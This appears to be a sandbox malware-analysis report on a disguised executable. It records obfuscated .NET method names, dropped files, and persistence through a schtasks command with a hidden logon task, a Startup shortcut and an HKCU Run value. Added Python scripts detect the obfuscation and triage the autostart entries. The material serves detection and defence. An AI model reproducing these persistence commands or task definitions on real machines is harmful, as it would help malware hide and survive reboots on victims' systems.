              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, jO1kLrkP6ITRPB9nRt.csHigh entropy of concatenated method names: 'e3yiLkv75w', 'Kvqia7Oluw', 'iXLiCiQfMB', 'RuuiZm7rqr', 'XWIincnmRA', 'biPCrgXJTD', 'NYeCuR1g51', 'swwC2J3LQV', 'pmhC7kZtQP', 'wwUCJdl7pJ'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, BCDpIFlNesVBIhQHgH.csHigh entropy of concatenated method names: 'lXwaPYplWD', 'z8Nav71VNK', 'iANa0QeSDq', 'j1Wap46uak', 'KPdarOnI7r', 'uYfaunmUii', 'u0Oa24HKnA', 'XsMa7Bwc1Z', 'ofiaJfrVbH', 'lr3aIFIlXL'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, GXpMZGv1DYx8eclQhb.csHigh entropy of concatenated method names: 'KoPZYBhF60', 'rncZgltk8v', 'Gl9ZOe5NAl', 'wnZZBSVfSR', 'K11ZHipBT4', 'AfsZjno0nB', 'T3DZw9LAED', 'PKVZbfGvp0', 'FncZAWsLVC', 'Ru5ZE8OZeU'
              Source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.ba90000.5.raw.unpack, ibRWnPCp5Mnp1nfdT7.csHigh entropy of concatenated method names: 'jxiZdXpYPh', 'BZwZkGZ8QB', 'oIYZiFpI7x', 'VIJiImoIrk', 'huRizFyiho', 'FDMZ9qipOS', 'umsZ6t9Q1O', 'aZoZq8PCQE', 'ooIZSlQtB1', 'W9SZKBc8tf'
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exeJump to dropped file
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Roaming\RTUZKYTc.exeJump to dropped file
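The "High entropy of concatenated method names" entries above are a renaming-obfuscator heuristic: a class whose methods are all random identifiers has a much flatter character distribution than one whose names are English-derived. The script below reproduces that heuristic over names taken from the report, as an added example rather than Joe Sandbox's own code: the sandbox's exact concatenation rule and threshold are not documented on this page, so the 4.8-bit cut-off, the control set of plain names and the report-line parser are assumptions.

```python
"""Shannon entropy over concatenated .NET method names.

Added example, not Joe Sandbox code. The sandbox's concatenation rule and
threshold are not documented on the page; the 4.8-bit cut-off below is an
assumption chosen to separate the two sets used here.
"""
import math
import re
from collections import Counter

# Names copied from the report entry for xqcOSno5WVFAjguVYG.cs.
OBFUSCATED = ['PjeCHrVhhT', 'fJ1Cww9irJ', 'TNMk1c5LZM', 'Tx8kThUqZg', 'M91k4QKN9X',
              'HS1kDOGODI', 'ox1k8tdxFm', 'dcQkQJxjMj', 'An2khOu51C', 'OJpksIvvBn']

# Constructed control set: the kind of names a hand-written WinForms or
# TypeConverter class carries (several also appear in the report's entries).
PLAIN = ['ToString', 'Dispose', 'GetEditStyle', 'EditValue', 'CanConvertFrom',
         'ConvertFrom', 'ConvertTo', 'ProcessDialogKey', 'Next', 'NextBytes']

ENTROPY_THRESHOLD = 4.8  # bits per character; assumed, see module docstring

# Accepts both the raw page text ("...csHigh entropy ...") and the cleaned form.
REPORT_LINE = re.compile(
    r"(?P<cls>\S+\.cs)\s*\|?\s*High entropy of concatenated method names:\s*(?P<names>.*)$"
)


def shannon_entropy(text: str) -> float:
    """Bits per character of the symbol distribution in `text`."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def name_entropy(names) -> float:
    """Entropy of all method names of one class joined into a single string."""
    return shannon_entropy("".join(names))


def looks_obfuscated(names, threshold: float = ENTROPY_THRESHOLD) -> bool:
    """Random identifiers flatten the character distribution; English-derived
    ones stay skewed toward a few letters (e, t, o, r, n, s)."""
    return name_entropy(names) > threshold


def parse_report_line(line: str):
    """Return (class file, [method names]) from one 'High entropy' report line,
    or None if the line is not such an entry."""
    m = REPORT_LINE.search(line)
    if not m:
        return None
    return m.group("cls"), re.findall(r"'([^']*)'", m.group("names"))


if __name__ == "__main__":
    for label, names in (("obfuscated", OBFUSCATED), ("plain", PLAIN)):
        print(f"{label:>10}: {name_entropy(names):.2f} bits/char, "
              f"flagged={looks_obfuscated(names)}")
```

The threshold is what needs tuning in practice: short name lists and classes that mix a few real overrides (`ToString`, `Dispose`) with renamed members sit closer to the boundary, which is why the report scores the concatenation per class rather than per method.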

              Boot Survival

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk (2 identical events)
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd. (2 identical events)

Note: the command line names C:\Windows\System32\schtasks.exe, but the image that ran is the SysWOW64 copy because the 32-bit parent is subject to file system redirection. The task body is passed only through the temp XML file; once registered, Task Scheduler keeps its own copy under C:\Windows\System32\Tasks\Updates\RTUZKYTc, so the task definition survives deletion of tmp960E.tmp and is the artifact to collect alongside the Startup .lnk and the HKCU Run value.
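The sample uses three user-land persistence channels at once: a scheduled task registered from a temp XML file, a Startup-folder shortcut, and an HKCU Run value. The script below triages all three from their on-disk representation, as an added example and not code from Joe Sandbox or from the sample. The task XML is constructed to resemble what schtasks /Create /XML consumes, since the page does not show the contents of tmp960E.tmp; the Run value data and the .lnk target are likewise assumed, because the report records only the value name and the shortcut file name.

```python
"""Triage of Task Scheduler XML and other user-land autostart entries.

Added example, not code from Joe Sandbox or from the sample. The task XML,
Run-key value data and .lnk target below are constructed; the report shows
the task name, the value name and the shortcut name but not their contents.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Locations a standard user can write to; an autostart launching from here is
# the pattern in this report (AppData\Roaming) and rarely legitimate.
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Roaming|Local\\Temp)|ProgramData|Users\\Public|Downloads|Desktop)\\",
    re.IGNORECASE,
)
AUTOSTART_TRIGGERS = {"LogonTrigger", "BootTrigger", "RegistrationTrigger"}


def local_name(tag: str) -> str:
    """Drop the '{namespace}' prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def path_flags(path: str) -> list:
    """Why a launch path is suspicious; an empty list means nothing notable."""
    flags = []
    if USER_WRITABLE.search(path):
        flags.append("launches from a user-writable directory")
    return flags


def triage_task_xml(xml_data) -> dict:
    """Pull the triage-relevant fields out of a task definition.

    Pass raw bytes for files written by schtasks /XML or found under
    %SystemRoot%\\System32\\Tasks: they are typically UTF-16 and the parser
    needs the BOM and declaration intact to decode them.
    """
    root = ET.fromstring(xml_data)
    command = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS)
    arguments = root.findtext("t:Actions/t:Exec/t:Arguments", default="", namespaces=NS)
    hidden_text = root.findtext("t:Settings/t:Hidden", default="false", namespaces=NS)
    hidden = hidden_text.strip().lower() == "true"
    triggers_el = root.find("t:Triggers", NS)
    triggers = [local_name(t.tag) for t in triggers_el] if triggers_el is not None else []

    flags = path_flags(command)
    if hidden:
        flags.append("hidden from the Task Scheduler UI")
    if AUTOSTART_TRIGGERS & set(triggers):
        flags.append("fires at logon/boot")
    return {"command": command, "arguments": arguments, "hidden": hidden,
            "triggers": triggers, "flags": flags}


def triage_autostarts(task_name, task_xml, run_values, startup_targets):
    """Combine the three persistence channels into (channel, entry, target, flags)
    findings, keeping only entries that raised at least one flag."""
    findings = []
    task = triage_task_xml(task_xml)
    if task["flags"]:
        findings.append(("schtasks", task_name, task["command"], task["flags"]))
    for value_name, command in run_values.items():
        flags = path_flags(command)
        if flags:
            findings.append(("HKCU Run", value_name, command, flags))
    for lnk_name, target in startup_targets.items():
        flags = path_flags(target)
        if flags:
            findings.append(("Startup folder", lnk_name, target, flags))
    return findings


# Constructed sample mirroring the report's task name and dropped-file paths.
SAMPLE_TASK_NAME = r"Updates\RTUZKYTc"
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\RTUZKYTc.exe</Command></Exec>
  </Actions>
</Task>"""
# Assumed value data and .lnk target (the report shows only the names).
SAMPLE_RUN_VALUES = {"SS Bottmac Engineers Pvt. Ltd.":
                     r"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"}
SAMPLE_STARTUP = {"SS Bottmac Engineers Pvt. Ltd..lnk":
                  r"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"}

if __name__ == "__main__":
    for channel, entry, target, flags in triage_autostarts(
            SAMPLE_TASK_NAME, SAMPLE_TASK_XML, SAMPLE_RUN_VALUES, SAMPLE_STARTUP):
        print(f"[{channel}] {entry} -> {target}: {'; '.join(flags)}")
```

On a live host the inputs come from `C:\Windows\System32\Tasks\<folder>\<name>`, the `Run` key under HKCU, and the `.lnk` files in the user's Startup folder; the path check is deliberately the same function for all three, since the common signal in this report is an executable dropped into AppData\Roaming rather than any one persistence mechanism.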

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe  Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
